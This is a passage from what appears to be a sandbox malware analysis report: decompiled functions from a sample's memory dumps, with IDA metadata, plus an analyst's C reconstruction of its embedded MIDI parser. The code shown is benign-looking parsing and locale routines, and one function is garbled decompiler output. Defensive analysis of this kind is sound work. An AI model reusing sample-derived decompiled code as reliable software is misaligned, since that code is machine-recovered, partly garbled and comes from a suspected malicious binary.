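    h->format      = rd_be16(buf + 8);
    h->ntrks       = rd_be16(buf + 10);
    h->division    = rd_be16(buf + 12);
    h->first_chunk = 14;
    return 0;
}

/* Walks the chunk list from `off`, loading each 4-byte tag the way the x86
 * sample does (as a little-endian dword) and counting those equal to
 * 0x6b72544d, the dword form of "MTrk" that E00428220 loops on. Returns the
 * count, or -1 when a chunk length runs past the end of the buffer. */
int smf_count_tracks(const uint8_t *buf, size_t len, size_t off) {
    int n = 0;
    while (off + 8 <= len) {
        const uint8_t *p = buf + off;
        uint32_t tag = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                       ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
        uint32_t clen = rd_be32(p + 4);
        if (clen > len - off - 8) return -1;   /* truncated chunk: refuse to walk past the end */
        if (tag == 0x6b72544dU) n++;
        off += 8 + clen;
    }
    return n;
}

/* Header check followed by the track walk; -1 on any failure. */
int smf_check(const uint8_t *buf, size_t len) {
    struct smf_header h;
    if (smf_parse_header(buf, len, &h) != 0) return -1;
    return smf_count_tracks(buf, len, h.first_chunk);
}

/* Constructed sample inputs (not taken from the analysed file): a minimal
 * format-0 file with one track, and a header whose length field is 7. */
static const uint8_t SMF_GOOD[] = {
    'M','T','h','d', 0,0,0,6, 0,0, 0,1, 0,96,
    'M','T','r','k', 0,0,0,4, 0x00,0xff,0x2f,0x00   /* end-of-track meta event */
};
static const uint8_t SMF_BAD_HDR[] = {
    'M','T','h','d', 0,0,0,7, 0,0, 0,1, 0,96, 0
};
static const size_t SMF_GOOD_LEN    = sizeof SMF_GOOD;
static const size_t SMF_BAD_HDR_LEN = sizeof SMF_BAD_HDR;

int main(void) {
    printf("good file: %d track(s)\n", smf_check(SMF_GOOD, SMF_GOOD_LEN));
    printf("bad header length: %d\n", smf_check(SMF_BAD_HDR, SMF_BAD_HDR_LEN));
    return 0;
}
```

    Run against a file taken from the sample's working set, a parse that succeeds with a plausible track count confirms the embedded parser is a MIDI reader rather than a custom format; the bounds check on the chunk length is the one the decompiled loop does not visibly perform.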

    C-Code - Quality: 93%
    			/* Parses a Standard MIDI File header: the byte-swapped dword at +4 must be 6 (the fixed MThd
    			   chunk length), the three big-endian 16-bit fields at +8 / +10 / +12 (in the SMF header: format,
    			   track count, division) are stored at +0xc / +0x10 / +0x14 of the context, and the loop below
    			   compares dwords with 0x6b72544d, i.e. "MTrk" read as a little-endian dword. */
    			E00428220(long __ecx) {
    				void* _t83;
    				signed int _t84;
    				signed int _t86;
    				intOrPtr _t96;
    				signed int _t98;
    				void* _t103;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t117;
    				signed int _t119;
    				intOrPtr _t124;
    				signed int _t125;
    				intOrPtr _t135;
    				signed int _t136;
    				void* _t137;
    				void* _t138;
    				void* _t139;
    				signed int* _t147;
    				void* _t160;
    				signed int _t169;
    				signed int _t191;
    				signed int _t193;
    				signed int _t197;
    				intOrPtr _t208;
    				void* _t209;
    				signed int* _t210;
    				signed int* _t211;
    				signed int _t212;
    				signed int _t213;
    				signed int _t214;
    				signed int* _t216;
    				long _t217;
    				void* _t218;
    				signed int _t219;
    				void* _t220;
    				void* _t221;
    				void* _t222;
    
    				_t217 = __ecx;
    				if( *((intOrPtr*)(__ecx + 8)) != 0) {
    					E004280B0(__ecx);
    				}
    				_t208 =  *((intOrPtr*)(_t220 + 0x34));
    				_t83 = E00428200(_t208,  *((intOrPtr*)(_t220 + 0x38)));
    				_t221 = _t220 + 8;
    				if(_t83 != 0) {
    					_t84 =  *(_t208 + 4);
    					_t209 = _t208 + 4;
    					__eflags = ((_t84 & 0x00ff0000 | _t84 >> 0x00000010) >> 0x00000008 | (_t84 << 0x00000010 | _t84 & 0x0000ff00) << 0x00000008) - 6;
    					if(((_t84 & 0x00ff0000 | _t84 >> 0x00000010) >> 0x00000008 | (_t84 << 0x00000010 | _t84 & 0x0000ff00) << 0x00000008) == 6) {
    						_t210 = _t209 + 4;
    						_t218 = _t217 + 0x5c;
    						_t147 = _t210;
    						_t211 =  &(_t210[1]);
    						 *((intOrPtr*)(_t221 + 0x18)) = 0;
    						 *((intOrPtr*)(_t221 + 0x1c)) = 0;
    						_t86 =  *_t147;
    						 *((intOrPtr*)(_t221 + 0x20)) = 0;
    						 *(_t221 + 0x10) = _t86;
    						 *(_t221 + 0x14) = _t147[1];
    						 *(_t217 + 0xc) = (_t86 & 0x0000ffff) >> 8;
    						 *(_t217 + 0x10) = ( *(_t221 + 0x12) & 0x0000ffff) >> 8;
    						 *((intOrPtr*)(_t221 + 0x24)) = 0;
    						 *(_t217 + 0x14) = ( *(_t221 + 0x14) & 0x0000ffff) >> 8;
    						 *((intOrPtr*)(_t221 + 0x34)) = 0;
    						 *((char*)(_t221 + 0x38)) = 0;
    						_t96 = E00429E70( *((intOrPtr*)(_t218 + 8)),  *((intOrPtr*)(_t218 + 8)),  *(_t218 + 4));
    						_t222 = _t221 + 0xc;
    						_t135 = _t96;
    						E0043D380(_t96, _t135,  *((intOrPtr*)(_t218 + 8)));
    						 *((intOrPtr*)(_t218 + 8)) = _t135;
    						_t98 =  *(_t218 + 4);
    						_t136 =  *(_t217 + 0x10);
    						__eflags = _t98;
    						if(_t98 != 0) {
    							_t191 = (0x2aaaaaab * ( *((intOrPtr*)(_t218 + 8)) - _t98) >> 0x20 >> 2) + (0x2aaaaaab * ( *((intOrPtr*)(_t218 + 8)) - _t98) >> 0x20 >> 2 >> 0x1f);
    							__eflags = _t191;
    						} else {
    							_t191 = 0;
    						}
    						__eflags = _t191 - _t136;
    						if(_t191 >= _t136) {
    							_t103 = E00429570(_t218);
    							__eflags = _t136 - _t103;
    							if(_t136 < _t103) {
    								E004298A0(_t218,  *(_t218 + 4) + (_t136 + _t136 * 2) * 8,  *((intOrPtr*)(_t218 + 8)));
    							}
    						} else {
    							 *((intOrPtr*)(_t222 + 0x10)) =  *((intOrPtr*)(_t218 + 8));
    							_push(_t222 + 0x18);
    							_push(_t136 - E00429570(_t218));
    							_push( *((intOrPtr*)(_t222 + 0x14)));
    							E004295A0(_t218);
    						}
    						_t137 = 0;
    						__eflags =  *(_t217 + 0x10);
    						if( *(_t217 + 0x10) <= 0) {
    							L20:
    							 *((intOrPtr*)(_t217 + 4)) =  *((intOrPtr*)(_t222 + 0x38));
    							_t160 = _t217 + 0x6c;
    							 *(_t217 + 8) =  *(_t222 + 0x34);
    							 *((intOrPtr*)(_t217 + 0x58)) =  *((intOrPtr*)(_t222 + 0x3c));
    							_t193 =  *(_t160 + 8);
    							_t212 =  *(_t160 + 4);
    							_t106 = _t193;
    							__eflags = _t106 - _t193;
    							while(_t106 != _t193) {
    								_t139 =  *_t106;
    								_t106 = _t106 + 4;
    								 *_t212 = _t139;
    								_t212 = _t212 + 4;
    								__eflags = _t106 - _t193;
    							}
    							 *(_t160 + 8) = _t212;
    							_t213 =  *(_t160 + 4);
    							 *(_t222 + 0x34) =  *(_t160 + 8);
    							__eflags = _t213;
    							 *(_t222 + 0x34) = 0x64;
    							if(_t213 == 0) {
    								L25:
    								_t108 = 0;
    								goto L27;
    							} else {
    								_t197 =  *(_t160 + 8);
    								__eflags = _t197 - _t213 >> 2 - 0x10;
    								if(__eflags >= 0) {
    									if(__eflags > 0) {
    										_t117 = _t197;
    										_t214 = _t213 + 0x40;
    										__eflags = _t117 - _t197;
    										while(_t117 != _t197) {
    											_t138 =  *_t117;
    											_t117 = _t117 + 4;
    											 *_t214 = _t138;
    											_t214 = _t214 + 4;
    											__eflags = _t117 - _t197;
    										}
    										 *(_t160 + 8) = _t214;
    										 *(_t222 + 0x34) =  *(_t160 + 8);
    									}
    								} else {
    									__eflags = _t213;
    									if(_t213 != 0) {
    										_t119 =  *(_t160 + 8) - _t213;
    										__eflags = _t119;
    										_t108 = _t119 >> 2;
    									} else {
    										goto L25;
    									}
    									L27:
    									_push(_t222 + 0x34);
    									_push(0x10 - _t108);
    									_push( *(_t160 + 8));
    									E004298E0(_t160);
    								}
    							}
    							_t111 = E00428EB0(_t217);
    							asm("sbb eax, eax");
    							return  ~( ~_t111);
    						} else {
    							_t219 = 0;
    							__eflags = 0;
    							while(1) {
    								__eflags =  *_t211 - 0x6b72544d;
    								if( *_t211 != 0x6b72544d) {
    									goto L3;
    								}
    								_t121 = _t211[1];
    								_t216 =  &(_t211[2]);
    								 *( *((intOrPtr*)(_t217 + 0x60)) + _t219 + 4) = (_t211[1] & 0x00ff0000 | _t211[1] >> 0x00000010) >> 0x00000008 | (_t211[1] << 0x00000010 | _t121 & 0x0000ff00) << 0x00000008;
    								 *( *((intOrPtr*)(_t217 + 0x60)) + _t219 + 0xc) = _t216;
    								 *( *((intOrPtr*)(_t217 + 0x60)) + _t219 + 8) = _t216;
    								_t124 =  *((intOrPtr*)(_t217 + 0x60));
    								_t169 =  *(_t124 + _t219 + 4);
    								_t211 = _t216 + _t169;
    								__eflags = _t169;
    								if(_t169 != 0) {
    									_t125 = E00428C10(_t124 + _t219, _t124 + _t219 + 0x10);
    									__eflags = _t125;
    									if(_t125 == 0) {
    										goto L3;
    									} else {
    										goto L19;
    									}
    								} else {
    									 *(_t124 + _t219) =  *(_t124 + _t219) | 0x00000001;
    									L19:
    									_t137 = _t137 + 1;
    									_t219 = _t219 + 0x18;
    									__eflags = _t137 -  *(_t217 + 0x10);
    									if(_t137 <  *(_t217 + 0x10)) {
    										continue;
    									} else {
    										goto L20;
    									}
    								}
    								goto L33;
    							}
    							goto L3;
    						}
    					} else {
    						__eflags = 0;
    						return 0;
    					}
    				} else {
    					L3:
    					return 0;
    				}
    				L33:
    			}

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: MTrk$d
    • API String ID: 0-4044675371
    • Opcode ID: 854d98c159ea09a42487003e3273e03e3d92713c94f82c3eaa97afae3cb6ca83
    • Instruction ID: 36a138734d5fd25b70b62b098a803fff5c462d8497843081f871c208e4a26ede
    • Opcode Fuzzy Hash: 854d98c159ea09a42487003e3273e03e3d92713c94f82c3eaa97afae3cb6ca83
    • Instruction Fuzzy Hash: F291D371B016168FD718DF29D88096EB7E2EFD8304B54893EE84ACB341EA39ED05C759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00440DE0() {
    				intOrPtr _t38;
    				intOrPtr _t66;
    				intOrPtr _t70;
    				void* _t95;
    				void* _t103;
    
    				_t95 =  *((intOrPtr*)(_t103 + 0x24)) + 0x84;
    				_t38 = 0xbadbad;
    				 *((intOrPtr*)(_t103 + 0x28)) = 0;
    				 *(_t103 + 0x10) = 0 << 8;
    				if(0 << 8 == 0) {
    					L6:
    					return 1;
    				} else {
					L1:
    					if(1 != 0) {
    						E00440860( *((intOrPtr*)(_t103 + 0x18)), 0,  *((intOrPtr*)(_t103 + 0x20)), 0 << 8, "ICC profile tag start not a multiple of 4");
    						_t38 =  *((intOrPtr*)(_t103 + 0x24));
    						_t103 = _t103 + 0x14;
    					}
    					_t66 =  *((intOrPtr*)(_t103 + 0x24));
    					if(0xbadbad > _t66 || 0xbadbad > _t66 - 0xbadbad) {
    						goto L7;
    					}
    					_t95 = _t95 + 0xc;
    					_t70 =  *((intOrPtr*)(_t103 + 0x28)) + 1;
    					 *((intOrPtr*)(_t103 + 0x28)) = _t70;
    					if(_t70 < _t38) {
    						goto L1;
    					} else {
    						goto L6;
    					}
    					goto L8;
    					L7:
    					return E00440860( *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)),  *((intOrPtr*)(_t103 + 0x20)), 0xbadbad, "ICC profile tag outside profile");
    				}
    				L8:
    			}

    Strings
    • ICC profile tag start not a multiple of 4, xrefs: 00440EA9
    • ICC profile tag outside profile, xrefs: 00440EF8
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: ICC profile tag outside profile$ICC profile tag start not a multiple of 4
    • API String ID: 0-2051163487
    • Opcode ID: 17b50337cbba9aabcd0db8ec6328b0c6ff122c9fe82f923f027972601d2876d2
    • Instruction ID: aab874bc816a8918cfdc1020be24f3f581c27acd4ec4614056e658a2d0b3f7d9
    • Opcode Fuzzy Hash: 17b50337cbba9aabcd0db8ec6328b0c6ff122c9fe82f923f027972601d2876d2
    • Instruction Fuzzy Hash: 9031E5B360879107E72CCA2E9C606ABBBD3ABC8245F1DC96DE5DAC3301E8659605C758
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E00494D1E(void* __eax, signed int __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
    				char _t25;
    				signed char _t34;
    				signed int _t38;
    				void* _t45;
    				void* _t49;
    				signed int _t52;
    
    				_t49 = __esi;
    				_t45 = __edi;
    				_t38 = __ecx;
    				_t25 = __eax + 1;
    				 *_t25 =  *_t25 + __ecx;
    				 *_t25 =  *_t25 + _t25;
    				asm("invalid");
    				 *0xf16ae8b9 = _t25;
    				_t34 = __ebx & __ecx;
    				_push(es);
    				if(__edx - 1 > 0) {
    					asm("in eax, 0xa7");
    					asm("cld");
    					_t38 = 0x6a;
    					 *(__esi - 0x24) =  *(__esi - 0x24) ^ _t52;
    				}
    				asm("fdivr qword [ecx+0x1c]");
    			}

    Memory Dump Source
    • Source File: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: abacf81991ee6cdd2aa859963d4d40b6d9b9a005150fb8392a3705d6d02220e4
    • Instruction ID: 1931214a01cf809b86cbd954aa5dd80c86a443ca49725a59049e247e36fa95d6
    • Opcode Fuzzy Hash: abacf81991ee6cdd2aa859963d4d40b6d9b9a005150fb8392a3705d6d02220e4
    • Instruction Fuzzy Hash: 07A2439648EBC25FE71787B05C7A6907FB09E23228B1E45DBC4C1CB0E3E58D095AD726
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0047E7DC(void* __eflags) {
    				void* _t6;
    				void* _t10;
    				signed char _t16;
    
    				_t6 = E00473450( *0x4e1b24);
    				asm("sbb eax, eax");
    				 *0x4e1b20 =  ~(_t6 - 3) + 1;
    				_t10 = E00473450( *0x4e1b28);
    				asm("sbb eax, eax");
    				 *0x4e1b14 =  *0x4e1b14 & 0x00000000;
    				 *0x4e1b18 =  ~(_t10 - 3) + 1;
    				if( *0x4e1b20 == 0) {
    					 *0x4e1b1c = E0047EE8D( *0x4e1b24);
    				} else {
    					 *0x4e1b1c = 2;
    				}
    				EnumSystemLocalesA(E0047E863, 1);
    				_t16 =  *0x4e1b2c; // 0x0
    				if((_t16 & 0x00000001) == 0 || (_t16 & 0x00000002) == 0 || (_t16 & 0x00000007) == 0) {
    					 *0x4e1b2c =  *0x4e1b2c & 0x00000000;
    					return _t16;
    				}
    				return _t16;
    			}

    APIs
    • EnumSystemLocalesA.KERNEL32(0047E863,00000001,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047E842
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnumLocalesSystem
    • String ID:
    • API String ID: 2099609381-0
    • Opcode ID: fd1bf86a2ed01bc2ee5372915fa2861664bba7089b2b59882edf4803f1b6b2ac
    • Instruction ID: 00051f333b0c17771e17eddc52cab3adcdca6b01a5430ad816285b868c9eb7ac
    • Opcode Fuzzy Hash: fd1bf86a2ed01bc2ee5372915fa2861664bba7089b2b59882edf4803f1b6b2ac
    • Instruction Fuzzy Hash: 25F08135690141CED700AF36ED89B9436A0A718319F01877AE408AE2F2E77C2489CB0E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0047EA67(void* __eflags) {
    				void* _t2;
    				intOrPtr _t5;
    				int _t7;
    
    				_t2 = E00473450( *0x4e1b24);
    				asm("sbb eax, eax");
    				_t5 =  ~(_t2 - 3) + 1;
    				 *0x4e1b20 = _t5;
    				if(_t5 == 0) {
    					 *0x4e1b1c = E0047EE8D( *0x4e1b24);
    				} else {
    					 *0x4e1b1c = 2;
    				}
    				_t7 = EnumSystemLocalesA(E0047EABD, 1);
    				if(( *0x4e1b2c & 0x00000004) == 0) {
    					 *0x4e1b2c =  *0x4e1b2c & 0x00000000;
    					return _t7;
    				}
    				return _t7;
    			}

    APIs
    • EnumSystemLocalesA.KERNEL32(0047EABD,00000001,?,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047EAA6
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnumLocalesSystem
    • String ID:
    • API String ID: 2099609381-0
    • Opcode ID: ed192c1ba65fd947763ad43fc84015756ca6024c555377b289476dc1ce797b6c
    • Instruction ID: 7d65c2b94c3acb7d22b4a64490c5259b07d6b21146a4eee694a58a948ab7075f
    • Opcode Fuzzy Hash: ed192c1ba65fd947763ad43fc84015756ca6024c555377b289476dc1ce797b6c
    • Instruction Fuzzy Hash: 5EE0E5796902919ED7119F32AC89BA03BA1B31C709F40837AE5088D5F6E7781549CF4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0047EB7A(void* __eflags) {
    				void* _t2;
    				int _t6;
    
    				_t2 = E00473450( *0x4e1b28);
    				asm("sbb eax, eax");
    				 *0x4e1b18 =  ~(_t2 - 3) + 1;
    				_t6 = EnumSystemLocalesA(E0047EBB1, 1);
    				if(( *0x4e1b2c & 0x00000004) == 0) {
    					 *0x4e1b2c =  *0x4e1b2c & 0x00000000;
    					return _t6;
    				}
    				return _t6;
    			}

    APIs
    • EnumSystemLocalesA.KERNEL32(0047EBB1,00000001,004BC0C8,?,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047EB9A
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnumLocalesSystem
    • String ID:
    • API String ID: 2099609381-0
    • Opcode ID: 6a6323f570c806c03a69d8be73c6ee0f4a74aef716cecf5f202ff9f4b54526f4
    • Instruction ID: 94a2102d8f5aa9130b03b6bae85187c0e502060eb56934eae80f96fda575138e
    • Opcode Fuzzy Hash: 6a6323f570c806c03a69d8be73c6ee0f4a74aef716cecf5f202ff9f4b54526f4
    • Instruction Fuzzy Hash: 5BD05E756902809ED7008F32AC49B603A90A318B19F5086BAE905881F3E2B92688CE4C
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SetUnhandledExceptionFilter.KERNEL32 ref: 0047C0F1
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: 7e15a8b32ff1e17c7da5f692edfbc01bb51ee740afd90081156ff258ac735aa7
    • Instruction ID: 58141c03e404777b24acf40258f1ceab2e6082131e66a865291a6314e33ddac8
    • Opcode Fuzzy Hash: 7e15a8b32ff1e17c7da5f692edfbc01bb51ee740afd90081156ff258ac735aa7
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0e0ae97ba6bee48522cf6a84d4d38360e013f1b0ae002f2c9fa666aa5ec8d4c1
    • Instruction ID: 4416fb302bd780838c92aa11413c43dfffc4f3392cff822a1fa706977c50af07
    • Opcode Fuzzy Hash: 0e0ae97ba6bee48522cf6a84d4d38360e013f1b0ae002f2c9fa666aa5ec8d4c1
    • Instruction Fuzzy Hash: 241250B16087018FCB18CF19D99062BBBE6EBC9304F15896EE889CB345E774DC45CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
